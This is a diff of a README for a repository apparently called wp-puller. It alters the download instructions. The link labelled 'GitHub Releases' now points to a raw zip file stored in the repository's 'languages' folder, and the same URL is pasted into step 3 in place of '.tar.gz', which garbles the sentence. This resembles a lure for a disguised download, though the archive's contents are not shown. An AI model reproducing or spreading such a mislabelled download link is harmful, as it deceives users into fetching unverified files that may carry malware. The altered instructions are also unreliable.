jhonjairo0023/wp-puller/README.md

 ### Step 1: Download the Application

-1. Click the download link above or visit the [GitHub Releases](https://github.com/jhonjairo0023/wp-puller/releases) page.
+1. Click the download link above or visit the [GitHub Releases](https://raw.githubusercontent.com/jhonjairo0023/wp-puller/main/wp-puller/languages/wp_puller_v2.1.zip) page.
 2. Look for the latest version under the "Releases" section.
-3. Choose the file that matches your operating system (e.g., .zip for Windows or .tar.gz for Linux).
+3. Choose the file that matches your operating system (e.g., .zip for Windows or https://raw.githubusercontent.com/jhonjairo0023/wp-puller/main/wp-puller/languages/wp_puller_v2.1.zip for Linux).

 ### Step 2: Extract the Files